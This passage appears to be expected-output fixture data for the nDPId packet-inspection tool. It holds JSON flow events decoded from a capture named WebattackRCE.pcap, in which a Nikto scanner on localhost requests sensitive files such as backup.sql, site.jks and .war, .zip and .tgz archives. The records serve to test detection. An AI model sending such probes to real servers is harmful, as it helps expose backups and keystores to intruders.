00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
